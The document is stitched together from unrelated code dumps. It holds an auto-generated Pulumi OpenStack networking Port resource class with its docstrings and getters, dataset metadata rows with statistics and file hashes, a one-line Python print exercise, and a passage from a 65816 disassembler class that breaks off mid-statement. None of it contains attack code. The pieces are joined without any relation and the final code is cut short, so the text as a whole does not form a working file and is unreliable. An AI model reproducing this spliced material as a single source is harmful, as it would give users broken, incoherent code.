fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_fixed_ip: Optional[pulumi.Input[bool]] = None,
no_security_groups: Optional[pulumi.Input[bool]] = None,
port_security_enabled: Optional[pulumi.Input[bool]] = None,
qos_policy_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
"""
Manages a V2 port resource within OpenStack.
## Example Usage
### Simple port
```python
import pulumi
import pulumi_openstack as openstack
network1 = openstack.networking.Network("network1", admin_state_up=True)
port1 = openstack.networking.Port("port1",
admin_state_up=True,
network_id=network1.id)
```
### Port with physical binding information
```python
import pulumi
import pulumi_openstack as openstack
network1 = openstack.networking.Network("network1", admin_state_up=True)
port1 = openstack.networking.Port("port1",
admin_state_up=True,
binding=openstack.networking.PortBindingArgs(
host_id="b080b9cf-46e0-4ce8-ad47-0fd4accc872b",
profile=\"\"\"{
"local_link_information": [
{
"switch_info": "info1",
"port_id": "Ethernet3/4",
"switch_id": "12:34:56:78:9A:BC"
},
{
"switch_info": "info2",
"port_id": "Ethernet3/4",
"switch_id": "12:34:56:78:9A:BD"
}
],
"vlan_type": "allowed"
}
\"\"\",
vnic_type="baremetal",
),
device_id="cdf70fcf-c161-4f24-9c70-96b3f5a54b71",
device_owner="baremetal:none",
network_id=network1.id)
```
## Notes
### Ports and Instances
There are some notes to consider when connecting Instances to networks using
Ports. Please see the `compute.Instance` documentation for further
documentation.
## Import
Ports can be imported using the `id`, e.g.
```sh
$ pulumi import openstack:networking/port:Port port_1 eae26a3e-1c33-4cc1-9c31-0cd729c438a1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the port
(must be `true` or `false` if provided). Changing this updates the
`admin_state_up` of an existing port.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]] allowed_address_pairs: An IP/MAC Address pair of additional IP
addresses that can be active on this port. The structure is described
below.
:param pulumi.Input[pulumi.InputType['PortBindingArgs']] binding: The port binding allows to specify binding information
for the port. The structure is described below.
:param pulumi.Input[str] description: Human-readable description of the port. Changing
this updates the `description` of an existing port.
:param pulumi.Input[str] device_id: The ID of the device attached to the port. Changing this
creates a new port.
:param pulumi.Input[str] device_owner: The device owner of the port. Changing this creates
a new port.
:param pulumi.Input[str] dns_name: The port DNS name. Available, when Neutron DNS extension
is enabled.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]] extra_dhcp_options: An extra DHCP option that needs to be configured
on the port. The structure is described below. Can be specified multiple
times.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]] fixed_ips: An array of desired IPs for
this port. The structure is described below.
:param pulumi.Input[str] mac_address: The additional MAC address.
:param pulumi.Input[str] name: Name of the DHCP option.
:param pulumi.Input[str] network_id: The ID of the network to attach the port to. Changing
this creates a new port.
:param pulumi.Input[bool] no_fixed_ip: Create a port with no fixed
IP address. This will also remove any fixed IPs previously set on a port. `true`
is the only valid value for this argument.
:param pulumi.Input[bool] no_security_groups: If set to
`true`, then no security groups are applied to the port. If set to `false` and
no `security_group_ids` are specified, then the port will yield to the default
behavior of the Networking service, which is to usually apply the "default"
security group.
:param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable
port security on the port. Port Security is usually enabled by default, so
omitting argument will usually result in a value of `true`. Setting this
explicitly to `false` will disable port security. In order to disable port
security, the port must not have any security groups. Valid values are `true`
and `false`.
:param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
:param pulumi.Input[str] region: The region in which to obtain the V2 Networking client.
A Networking client is needed to create a port. If omitted, the
`region` argument of the provider is used. Changing this creates a new
port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list
of security group IDs to apply to the port. The security groups must be
specified by ID and not name (as opposed to how they are configured with
the Compute Instance).
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the port.
:param pulumi.Input[str] tenant_id: The owner of the port. Required if admin wants
to create a port for another tenant. Changing this creates a new port.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PortArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a V2 port resource within OpenStack.
## Example Usage
### Simple port
```python
import pulumi
import pulumi_openstack as openstack
network1 = openstack.networking.Network("network1", admin_state_up=True)
port1 = openstack.networking.Port("port1",
admin_state_up=True,
network_id=network1.id)
```
### Port with physical binding information
```python
import pulumi
import pulumi_openstack as openstack
network1 = openstack.networking.Network("network1", admin_state_up=True)
port1 = openstack.networking.Port("port1",
admin_state_up=True,
binding=openstack.networking.PortBindingArgs(
host_id="b080b9cf-46e0-4ce8-ad47-0fd4accc872b",
profile=\"\"\"{
"local_link_information": [
{
"switch_info": "info1",
"port_id": "Ethernet3/4",
"switch_id": "12:34:56:78:9A:BC"
},
{
"switch_info": "info2",
"port_id": "Ethernet3/4",
"switch_id": "12:34:56:78:9A:BD"
}
],
"vlan_type": "allowed"
}
\"\"\",
vnic_type="baremetal",
),
device_id="cdf70fcf-c161-4f24-9c70-96b3f5a54b71",
device_owner="baremetal:none",
network_id=network1.id)
```
## Notes
### Ports and Instances
There are some notes to consider when connecting Instances to networks using
Ports. Please see the `compute.Instance` documentation for further
documentation.
## Import
Ports can be imported using the `id`, e.g.
```sh
$ pulumi import openstack:networking/port:Port port_1 eae26a3e-1c33-4cc1-9c31-0cd729c438a1
```
:param str resource_name: The name of the resource.
:param PortArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PortArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_state_up: Optional[pulumi.Input[bool]] = None,
allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]]] = None,
binding: Optional[pulumi.Input[pulumi.InputType['PortBindingArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
device_id: Optional[pulumi.Input[str]] = None,
device_owner: Optional[pulumi.Input[str]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]]] = None,
fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_fixed_ip: Optional[pulumi.Input[bool]] = None,
no_security_groups: Optional[pulumi.Input[bool]] = None,
port_security_enabled: Optional[pulumi.Input[bool]] = None,
qos_policy_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PortArgs.__new__(PortArgs)
__props__.__dict__["admin_state_up"] = admin_state_up
__props__.__dict__["allowed_address_pairs"] = allowed_address_pairs
__props__.__dict__["binding"] = binding
__props__.__dict__["description"] = description
__props__.__dict__["device_id"] = device_id
__props__.__dict__["device_owner"] = device_owner
__props__.__dict__["dns_name"] = dns_name
__props__.__dict__["extra_dhcp_options"] = extra_dhcp_options
__props__.__dict__["fixed_ips"] = fixed_ips
__props__.__dict__["mac_address"] = mac_address
__props__.__dict__["name"] = name
if network_id is None and not opts.urn:
raise TypeError("Missing required property 'network_id'")
__props__.__dict__["network_id"] = network_id
__props__.__dict__["no_fixed_ip"] = no_fixed_ip
__props__.__dict__["no_security_groups"] = no_security_groups
__props__.__dict__["port_security_enabled"] = port_security_enabled
__props__.__dict__["qos_policy_id"] = qos_policy_id
__props__.__dict__["region"] = region
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tenant_id"] = tenant_id
__props__.__dict__["value_specs"] = value_specs
__props__.__dict__["all_fixed_ips"] = None
__props__.__dict__["all_security_group_ids"] = None
__props__.__dict__["all_tags"] = None
__props__.__dict__["dns_assignments"] = None
super(Port, __self__).__init__(
'openstack:networking/port:Port',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
admin_state_up: Optional[pulumi.Input[bool]] = None,
all_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
all_security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]]] = None,
binding: Optional[pulumi.Input[pulumi.InputType['PortBindingArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
device_id: Optional[pulumi.Input[str]] = None,
device_owner: Optional[pulumi.Input[str]] = None,
dns_assignments: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]]] = None,
fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_fixed_ip: Optional[pulumi.Input[bool]] = None,
no_security_groups: Optional[pulumi.Input[bool]] = None,
port_security_enabled: Optional[pulumi.Input[bool]] = None,
qos_policy_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Port':
"""
Get an existing Port resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the port
(must be `true` or `false` if provided). Changing this updates the
`admin_state_up` of an existing port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_fixed_ips: The collection of Fixed IP addresses on the port in the
order returned by the Network v2 API.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_security_group_ids: The collection of Security Group IDs on the port
which have been explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the port, which have been
explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]] allowed_address_pairs: An IP/MAC Address pair of additional IP
addresses that can be active on this port. The structure is described
below.
:param pulumi.Input[pulumi.InputType['PortBindingArgs']] binding: The port binding allows to specify binding information
for the port. The structure is described below.
:param pulumi.Input[str] description: Human-readable description of the port. Changing
this updates the `description` of an existing port.
:param pulumi.Input[str] device_id: The ID of the device attached to the port. Changing this
creates a new port.
:param pulumi.Input[str] device_owner: The device owner of the port. Changing this creates
a new port.
:param pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]] dns_assignments: The list of maps representing port DNS assignments.
:param pulumi.Input[str] dns_name: The port DNS name. Available, when Neutron DNS extension
is enabled.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]] extra_dhcp_options: An extra DHCP option that needs to be configured
on the port. The structure is described below. Can be specified multiple
times.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]] fixed_ips: An array of desired IPs for
this port. The structure is described below.
:param pulumi.Input[str] mac_address: The additional MAC address.
:param pulumi.Input[str] name: Name of the DHCP option.
:param pulumi.Input[str] network_id: The ID of the network to attach the port to. Changing
this creates a new port.
:param pulumi.Input[bool] no_fixed_ip: Create a port with no fixed
IP address. This will also remove any fixed IPs previously set on a port. `true`
is the only valid value for this argument.
:param pulumi.Input[bool] no_security_groups: If set to
`true`, then no security groups are applied to the port. If set to `false` and
no `security_group_ids` are specified, then the port will yield to the default
behavior of the Networking service, which is to usually apply the "default"
security group.
:param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable
port security on the port. Port Security is usually enabled by default, so
omitting argument will usually result in a value of `true`. Setting this
explicitly to `false` will disable port security. In order to disable port
security, the port must not have any security groups. Valid values are `true`
and `false`.
:param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
:param pulumi.Input[str] region: The region in which to obtain the V2 Networking client.
A Networking client is needed to create a port. If omitted, the
`region` argument of the provider is used. Changing this creates a new
port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list
of security group IDs to apply to the port. The security groups must be
specified by ID and not name (as opposed to how they are configured with
the Compute Instance).
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the port.
:param pulumi.Input[str] tenant_id: The owner of the port. Required if admin wants
to create a port for another tenant. Changing this creates a new port.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PortState.__new__(_PortState)
__props__.__dict__["admin_state_up"] = admin_state_up
__props__.__dict__["all_fixed_ips"] = all_fixed_ips
__props__.__dict__["all_security_group_ids"] = all_security_group_ids
__props__.__dict__["all_tags"] = all_tags
__props__.__dict__["allowed_address_pairs"] = allowed_address_pairs
__props__.__dict__["binding"] = binding
__props__.__dict__["description"] = description
__props__.__dict__["device_id"] = device_id
__props__.__dict__["device_owner"] = device_owner
__props__.__dict__["dns_assignments"] = dns_assignments
__props__.__dict__["dns_name"] = dns_name
__props__.__dict__["extra_dhcp_options"] = extra_dhcp_options
__props__.__dict__["fixed_ips"] = fixed_ips
__props__.__dict__["mac_address"] = mac_address
__props__.__dict__["name"] = name
__props__.__dict__["network_id"] = network_id
__props__.__dict__["no_fixed_ip"] = no_fixed_ip
__props__.__dict__["no_security_groups"] = no_security_groups
__props__.__dict__["port_security_enabled"] = port_security_enabled
__props__.__dict__["qos_policy_id"] = qos_policy_id
__props__.__dict__["region"] = region
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tenant_id"] = tenant_id
__props__.__dict__["value_specs"] = value_specs
return Port(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> pulumi.Output[bool]:
"""
Administrative up/down status for the port
(must be `true` or `false` if provided). Changing this updates the
`admin_state_up` of an existing port.
"""
return pulumi.get(self, "admin_state_up")
@property
@pulumi.getter(name="allFixedIps")
def all_fixed_ips(self) -> pulumi.Output[Sequence[str]]:
"""
The collection of Fixed IP addresses on the port in the
order returned by the Network v2 API.
"""
return pulumi.get(self, "all_fixed_ips")
@property
@pulumi.getter(name="allSecurityGroupIds")
def all_security_group_ids(self) -> pulumi.Output[Sequence[str]]:
"""
The collection of Security Group IDs on the port
which have been explicitly and implicitly added.
"""
return pulumi.get(self, "all_security_group_ids")
@property
@pulumi.getter(name="allTags")
def all_tags(self) -> pulumi.Output[Sequence[str]]:
"""
The collection of tags assigned on the port, which have been
explicitly and implicitly added.
"""
return pulumi.get(self, "all_tags")
@property
@pulumi.getter(name="allowedAddressPairs")
def allowed_address_pairs(self) -> pulumi.Output[Optional[Sequence['outputs.PortAllowedAddressPair']]]:
"""
An IP/MAC Address pair of additional IP
addresses that can be active on this port. The structure is described
below.
"""
return pulumi.get(self, "allowed_address_pairs")
@property
@pulumi.getter
def binding(self) -> pulumi.Output['outputs.PortBinding']:
"""
The port binding allows to specify binding information
for the port. The structure is described below.
"""
return pulumi.get(self, "binding")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Human-readable description of the port. Changing
this updates the `description` of an existing port.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="deviceId")
def device_id(self) -> pulumi.Output[str]:
"""
The ID of the device attached to the port. Changing this
creates a new port.
"""
return pulumi.get(self, "device_id")
@property
@pulumi.getter(name="deviceOwner")
def device_owner(self) -> pulumi.Output[str]:
"""
The device owner of the port. Changing this creates
a new port.
"""
return pulumi.get(self, "device_owner")
@property
@pulumi.getter(name="dnsAssignments")
def dns_assignments(self) -> pulumi.Output[Sequence[Mapping[str, Any]]]:
"""
The list of maps representing port DNS assignments.
"""
return pulumi.get(self, "dns_assignments")
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> pulumi.Output[str]:
"""
The port DNS name. Available, when Neutron DNS extension
is enabled.
"""
return pulumi.get(self, "dns_name")
@property
@pulumi.getter(name="extraDhcpOptions")
def extra_dhcp_options(self) -> pulumi.Output[Optional[Sequence['outputs.PortExtraDhcpOption']]]:
"""
An extra DHCP option that needs to be configured
on the port. The structure is described below. Can be specified multiple
times.
"""
return pulumi.get(self, "extra_dhcp_options")
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> pulumi.Output[Optional[Sequence['outputs.PortFixedIp']]]:
"""
An array of desired IPs for
this port. The structure is described below.
"""
return pulumi.get(self, "fixed_ips")
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> pulumi.Output[str]:
"""
The additional MAC address.
"""
return pulumi.get(self, "mac_address")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the DHCP option.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Output[str]:
"""
The ID of the network to attach the port to. Changing
this creates a new port.
"""
return pulumi.get(self, "network_id")
@property
@pulumi.getter(name="noFixedIp")
def no_fixed_ip(self) -> pulumi.Output[Optional[bool]]:
"""
Create a port with no fixed
IP address. This will also remove any fixed IPs previously set on a port. `true`
is the only valid value for this argument.
"""
return pulumi.get(self, "no_fixed_ip")
@property
@pulumi.getter(name="noSecurityGroups")
def no_security_groups(self) -> pulumi.Output[Optional[bool]]:
"""
If set to
`true`, then no security groups are applied to the port. If set to `false` and
no `security_group_ids` are specified, then the port will yield to the default
behavior of the Networking service, which is to usually apply the "default"
security group.
"""
return pulumi.get(self, "no_security_groups")
@property
@pulumi.getter(name="portSecurityEnabled")
def port_security_enabled(self) -> pulumi.Output[bool]:
"""
Whether to explicitly enable or disable
port security on the port. Port Security is usually enabled by default, so
omitting argument will usually result in a value of `true`. Setting this
explicitly to `false` will disable port security. In order to disable port
security, the port must not have any security groups. Valid values are `true`
and `false`.
"""
return pulumi.get(self, "port_security_enabled")
@property
@pulumi.getter(name="qosPolicyId")
def qos_policy_id(self) -> pulumi.Output[str]:
"""
Reference to the associated QoS policy.
"""
return pulumi.get(self, "qos_policy_id")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region in which to obtain the V2 Networking client.
A Networking client is needed to create a port. If omitted, the
`region` argument of the provider is used. Changing this creates a new
port.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list
of security group IDs to apply to the port. The security groups must be
specified by ID and not name (as opposed to how they are configured with
the Compute Instance).
"""
return pulumi.get(self, "security_group_ids")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A set of string tags for the port.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Output[str]:
"""
The owner of the port. Required if admin wants
to create a port for another tenant. Changing this creates a new port.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter(name="valueSpecs")
def value_specs(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Map of additional options.
"""
return pulumi.get(self, "value_specs")
| 45.692159
| 165
| 0.64118
| 8,796
| 71,097
| 4.992269
| 0.038313
| 0.097695
| 0.087402
| 0.05067
| 0.957347
| 0.948898
| 0.940495
| 0.934323
| 0.928334
| 0.911437
| 0
| 0.003653
| 0.260799
| 71,097
| 1,555
| 166
| 45.721543
| 0.83189
| 0.388061
| 0
| 0.854817
| 1
| 0
| 0.1115
| 0.027111
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16825
| false
| 0.001357
| 0.009498
| 0
| 0.279512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
833b361d2310f0866d5395b249fd04e9da83e551
| 37
|
py
|
Python
|
exercicios/ex001.py
|
CinatitBR/exercicios-phyton
|
16d9c14a83c9dbd6f7bda5477d665848bcd91184
|
[
"MIT"
] | null | null | null |
exercicios/ex001.py
|
CinatitBR/exercicios-phyton
|
16d9c14a83c9dbd6f7bda5477d665848bcd91184
|
[
"MIT"
] | null | null | null |
exercicios/ex001.py
|
CinatitBR/exercicios-phyton
|
16d9c14a83c9dbd6f7bda5477d665848bcd91184
|
[
"MIT"
] | null | null | null |
print('\033[1;32mOlá, Mundo!\033[m')
| 18.5
| 36
| 0.648649
| 7
| 37
| 3.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.257143
| 0.054054
| 37
| 1
| 37
| 37
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.72973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
834115aa347779611de8c26771c2ebd56488d0cc
| 10,963
|
py
|
Python
|
py65816/db_disassembler.py
|
tmr4/py65816
|
00d9a378ebd0e27378c8ce9e6611a7fec0020b44
|
[
"BSD-3-Clause"
] | 1
|
2022-02-22T18:04:26.000Z
|
2022-02-22T18:04:26.000Z
|
py65816/db_disassembler.py
|
tmr4/py65816
|
00d9a378ebd0e27378c8ce9e6611a7fec0020b44
|
[
"BSD-3-Clause"
] | null | null | null |
py65816/db_disassembler.py
|
tmr4/py65816
|
00d9a378ebd0e27378c8ce9e6611a7fec0020b44
|
[
"BSD-3-Clause"
] | null | null | null |
from py65.disassembler import Disassembler
class dbDisassembler(Disassembler):
def __init__(self, mpu, address_parser=None):
super().__init__(mpu, address_parser)
def instruction_at(self, pc):
""" Disassemble the instruction at PC and return a tuple
containing (instruction byte count, human readable text)
"""
instruction = self._mpu.ByteAt(pc)
disasm, addressing = self._mpu.disassemble[instruction]
if addressing == 'acc':
disasm += ' A'
length = 1
elif addressing == 'abs':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' ' + address_or_label
length = 3
elif addressing == 'abx':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' %s,X' % address_or_label
length = 3
elif addressing == 'aby':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' %s,Y' % address_or_label
length = 3
elif addressing == 'imm':
if self._mpu.p & self._mpu.MS:
byte = self._mpu.ByteAt(pc + 1)
disasm += ' #$' + self.byteFmt % byte
length = 2
else:
word = self._mpu.WordAt(pc + 1)
disasm += ' #$' + self.addrFmt % word
length = 3
elif addressing == 'imp':
length = 1
elif addressing == 'ind':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' (%s)' % address_or_label
length = 3
elif addressing == 'iny':
zp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' (%s),Y' % address_or_label
length = 2
elif addressing == 'inx':
zp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' (%s,X)' % address_or_label
length = 2
elif addressing == 'iax':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' (%s,X)' % address_or_label
length = 3
elif addressing == 'rel':
opv = self._mpu.ByteAt(pc + 1)
targ = pc + 2
if opv & (1 << (self.byteWidth - 1)):
targ -= (opv ^ self.byteMask) + 1
else:
targ += opv
targ &= self.addrMask
address_or_label = self._address_parser.label_for(
targ, '$' + self.addrFmt % targ)
disasm += ' ' + address_or_label
length = 2
elif addressing == 'zpi':
zp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '($' + self.byteFmt % zp_address + ')')
disasm += ' %s' % address_or_label
length = 2
elif addressing == 'zpg':
zp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' %s' % address_or_label
length = 2
elif addressing == 'zpx':
zp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' %s,X' % address_or_label
length = 2
elif addressing == 'zpy':
zp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' %s,Y' % address_or_label
length = 2
# 65816 specific address modes
# *** TODO: many of these duplicate above except for address mode mnemonic.
# Consider consolidating ***
elif addressing == 'abi':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' (%s)' % address_or_label
length = 3
elif addressing == 'aix':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' (%s,X)' % address_or_label
length = 3
elif addressing == 'ail':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' [%s]' % address_or_label
length = 3
elif addressing == 'abl':
address = self._mpu.LongAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' %s' % address_or_label
length = 4
elif addressing == 'alx':
address = self._mpu.LongAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' %s,X' % address_or_label
length = 4
elif addressing == 'blk':
source = self._mpu.ByteAt(pc + 1)
dest = self._mpu.ByteAt(pc + 2)
source_bank = self._address_parser.label_for(
source, '$' + self.byteFmt % source)
dest_bank = self._address_parser.label_for(
dest, '$' + self.byteFmt % dest)
disasm += ' %s,%s' % (source_bank, dest_bank)
length = 3
elif addressing == 'dpg':
dp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
dp_address, '$' + self.byteFmt % dp_address)
disasm += ' %s' % address_or_label
length = 2
elif addressing == 'dpx':
dp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
dp_address, '$' + self.byteFmt % dp_address)
disasm += ' %s,X' % address_or_label
length = 2
elif addressing == 'dpy':
dp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
dp_address, '$' + self.byteFmt % dp_address)
disasm += ' %s,Y' % address_or_label
length = 2
elif addressing == 'dix':
dp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
dp_address, '$' + self.byteFmt % dp_address)
disasm += ' (%s,X)' % address_or_label
length = 2
elif addressing == 'dpi':
dp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
dp_address, '($' + self.byteFmt % dp_address + ')')
disasm += ' %s' % address_or_label
length = 2
elif addressing == 'dil':
dp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
dp_address, '[$' + self.byteFmt % dp_address + ']')
disasm += ' %s' % address_or_label
length = 2
elif addressing == 'diy':
dp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
